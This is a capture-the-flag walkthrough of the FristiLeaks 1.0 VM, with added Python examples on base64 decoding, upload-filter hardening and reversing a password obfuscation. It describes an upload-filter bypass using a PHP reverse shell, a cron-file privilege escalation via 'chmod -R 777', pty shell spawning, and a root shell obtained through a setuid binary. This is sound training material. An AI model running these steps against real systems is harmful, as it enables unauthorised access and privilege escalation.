A small VM made for a Dutch informal hacker meetup called Fristileaks. Meant to be broken in a few hours without requiring debuggers, reverse engineering, etc.
nmap -p- -sV 192.168.2.19
Let’s start with robots.txt
Nothing useful there. Every page listed in it just showed a picture telling me I'm off track.
I made a wordlist from all the words found on those pages and ran it through dirb.
Finally another lead: /fristi/.
This looks like a login portal asking for a username and password.
No SQLi or other notable vulnerabilities in the form. Let's look at the page source.
A comment in the page source suggests that the image is base64 encoded. Decoding the two blobs with an online decoder shows that the first one is the Simpsons picture and the second one is an image containing a combination of two letters.
The page source also mentions that it was created by eezeepz. Would that name plus the letters from the picture be the right username and password to log in? Yes it would. 🙂
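The decoding step above can be done offline instead of pasting blobs into a web decoder. The following script is an added example and is not part of the original write-up or of the VM: it pulls every HTML comment whose body looks like base64 out of a saved page, decodes it, and identifies the result by magic bytes rather than trusting any extension. The sample HTML and the truncated PNG header embedded in it are constructed for the example; `extract_base64_blobs`, `sniff_image_type` and `decode_blobs` are names chosen here.

```python
import base64
import binascii
import re
import sys
from pathlib import Path

# Magic bytes for the image formats the login page and its upload filter deal with.
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}

COMMENT_RE = re.compile(r"<!--(.*?)-->", re.DOTALL)
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def extract_base64_blobs(html: str, min_len: int = 16) -> list:
    """Return each HTML comment body that, with whitespace removed, is plausibly base64.

    Multi-line blobs (as found in the page source) are joined first; ordinary
    comment text is rejected by the character-class check or the length-mod-4 check.
    """
    blobs = []
    for body in COMMENT_RE.findall(html):
        compact = "".join(body.split())
        if len(compact) >= min_len and len(compact) % 4 == 0 and B64_RE.match(compact):
            blobs.append(compact)
    return blobs


def sniff_image_type(data: bytes):
    """Identify PNG/JPEG/GIF from the leading bytes; None for anything else."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def decode_blobs(html: str) -> list:
    """Decode every candidate blob; returns (image_type_or_None, raw_bytes) tuples."""
    out = []
    for blob in extract_base64_blobs(html):
        try:
            raw = base64.b64decode(blob, validate=True)
        except (ValueError, binascii.Error):
            continue  # looked like base64 but was not; skip it
        out.append((sniff_image_type(raw), raw))
    return out


# Constructed sample: one decoy comment plus one comment holding a (truncated) PNG.
PNG_STUB = b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\rIHDR" + b"\x00" * 13
SAMPLE_HTML = (
    "<html><body><img src='image.png'>\n"
    "<!-- this is not the image you are looking for -->\n"
    "<!--\n" + base64.b64encode(PNG_STUB).decode("ascii") + "\n-->\n"
    "</body></html>"
)


if __name__ == "__main__":
    # Usage: python extract_blobs.py saved_page.html  -> writes blob_0.png, blob_1.gif, ...
    html = Path(sys.argv[1]).read_text(errors="replace") if len(sys.argv) > 1 else SAMPLE_HTML
    for i, (kind, raw) in enumerate(decode_blobs(html)):
        name = f"blob_{i}.{kind or 'bin'}"
        Path(name).write_bytes(raw)
        print(f"{name}: {len(raw)} bytes, type={kind}")
```

Writing the decoded bytes to disk and opening them as images is what reveals the letters; sniffing the magic bytes first tells you whether a blob is an image at all before you bother.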
OK. Now to upload a malicious file. There is a filter that only allows files with the extension jpg, gif or png. Time to start up Burp Suite and tamper with the file extension. I prefer the php-reverse-shell from pentestmonkey.
The upload succeeded, and in the meantime I had started a listener on port 31337.
After checking /home/ it seems I can only read the directory of eezeepz.
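The write-up does not show the upload filter's code, so the following is an added example, not the VM's own check: it models the common weak pattern (look only at the text after the last dot) next to a stricter check that enforces a single extension, verifies the magic bytes, and stores the file under a server-generated name. The sample filenames and contents are constructed; `weak_check`, `strict_check` and `storage_name` are names chosen here. Whether a name like `shell.php.png` actually gets executed depends on the web server's handler configuration, which the check below cannot fix; it only stops the name from being accepted.

```python
import re
import secrets

# Extension -> magic bytes the content must start with.
ALLOWED = {
    "jpg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",  # covers GIF87a and GIF89a
}

# One short basename, one dot, one allowed extension; nothing else.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.(jpg|gif|png)$", re.IGNORECASE)


def weak_check(filename: str) -> bool:
    """Naive filter: only the part after the LAST dot is inspected.

    'shell.php.png' passes because its last extension is png.
    """
    ext = filename.rsplit(".", 1)[-1].lower()
    return ext in ALLOWED


def strict_check(filename: str, content: bytes) -> bool:
    """Hardened filter: exactly one extension, and the bytes must match it."""
    m = SAFE_NAME.match(filename)
    if not m:
        return False
    ext = m.group(1).lower()
    return content.startswith(ALLOWED[ext])


def storage_name(filename: str) -> str:
    """Never reuse the user-supplied name on disk: random basename, validated extension."""
    ext = SAFE_NAME.match(filename).group(1).lower()
    return f"{secrets.token_hex(8)}.{ext}"


# Constructed uploads: a real-looking PNG and a PHP reverse shell renamed to slip past the filter.
PNG_UPLOAD = ("cat.png", b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR")
SHELL_UPLOAD = ("shell.php.png", b"<?php set_time_limit (0); $ip = '10.0.0.1'; ?>")


def run_demo() -> dict:
    """Return each check's verdict for both uploads so the difference is visible."""
    return {
        name: {"weak": weak_check(name), "strict": strict_check(name, data)}
        for name, data in (PNG_UPLOAD, SHELL_UPLOAD)
    }


if __name__ == "__main__":
    for name, verdict in run_demo().items():
        print(f"{name:15} weak={verdict['weak']!s:5} strict={verdict['strict']}")
```

The magic-byte check matters on its own: an attacker can also prepend a valid GIF header to a PHP file, so the strict check is only one layer; the server must additionally refuse to execute anything from the upload directory.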
Inside there is a text file with the name ‘notes’.
OK. So I have access to copies of echo and chmod in /home/admin/ and I'm allowed to run them from there.
And a file named /tmp/runthis will get executed every minute by root. Well, that's nice. Let's make /home/admin/ world writable.
echo "/home/admin/chmod -R 777 /home/admin" > /tmp/runthis
Let's check out the /home/admin/ directory. Inside there are a few interesting files.
Let's start with whoisyourgodnow.txt.
Hmmmmmm. Let’s try another one.
Hmmmmmm. Still nothing.
sh-4.1$ cat cryptpass.py
#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
return codecs.encode(base64string[::-1], 'rot13')
So the string in cryptedpass.txt was produced by cryptpass.py: base64 encode, reverse the string, then rot13. To recover it the steps have to be undone in reverse order: rot13 (which is its own inverse), reverse the string, base64 decode. Let's write a script to do that.
So now I have two plaintexts. Since one of the encrypted files is owned by a user called fristigod, it could be rewarding to switch to that user.
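The decoder below is an added example, not the script from the write-up or the VM. `encode_string` is a Python 3 port of the one line of cryptpass.py quoted above (the original is Python 2, where base64 returns a str); `decode_string` undoes the three steps in reverse order. The sample plaintexts are constructed; the real contents of cryptedpass.txt are not reproduced here.

```python
import base64
import codecs
import sys


def encode_string(plaintext: str) -> str:
    """Port of cryptpass.py: base64-encode, reverse the string, then rot13."""
    b64 = base64.b64encode(plaintext.encode("utf-8")).decode("ascii")
    return codecs.encode(b64[::-1], "rot13")


def decode_string(ciphertext: str) -> str:
    """Inverse of encode_string.

    rot13 undoes itself, reversing undoes reversing, and base64 decoding undoes
    the encoding; only the order has to be flipped.
    """
    b64 = codecs.encode(ciphertext, "rot13")[::-1]
    return base64.b64decode(b64).decode("utf-8")


def roundtrip_ok(plaintext: str) -> bool:
    """Sanity check that decode_string(encode_string(x)) == x."""
    return decode_string(encode_string(plaintext)) == plaintext


if __name__ == "__main__":
    # Usage: python uncryptpass.py <ciphertext>   (e.g. the line from cryptedpass.txt)
    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} <ciphertext>")
    print(decode_string(sys.argv[1]))
```

Note that the scheme is reversible by anyone who can read the script; it is obfuscation, not encryption, so "encrypted" passwords stored this way are effectively plaintext.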
standard in must be a tty
I need a tty. Let's spawn one with Python.
python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.1$ su fristigod
Let's look for more files belonging to fristigod.
find / -print 2>/dev/null | grep -i fristigod
Who doesn’t like secret stuff? What could it be?
doCom: setuid setgid ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, not stripped
Nice try, but wrong user 😉
Bummer. But what can this account do?
sudo -l -U fristigod
Matching Defaults entries for fristigod on this host:
requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
User fristigod may run the following commands on this host:
(fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom
So fristigod can run doCom, but only as the user fristi. Let's try that.
sudo -u fristi ./doCom
Usage: ./program_name terminal_command …
bash-4.1$ sudo -u fristi ./doCom whoami
Alright. The binary is setuid root and runs whatever command it is given, so time to wrap things up.
sudo -u fristi ./doCom /bin/bash
uid=0(root) gid=100(users) groups=100(users),502(fristigod)
Let's go to /root and take a look inside. There is a file named fristileaks_secrets.txt.
Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]
I wonder if you beat it in the maximum 4 hours it’s supposed to take!
Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)
Too bad I didn't make it within the 4 hours. But hey, there is always room for improvement.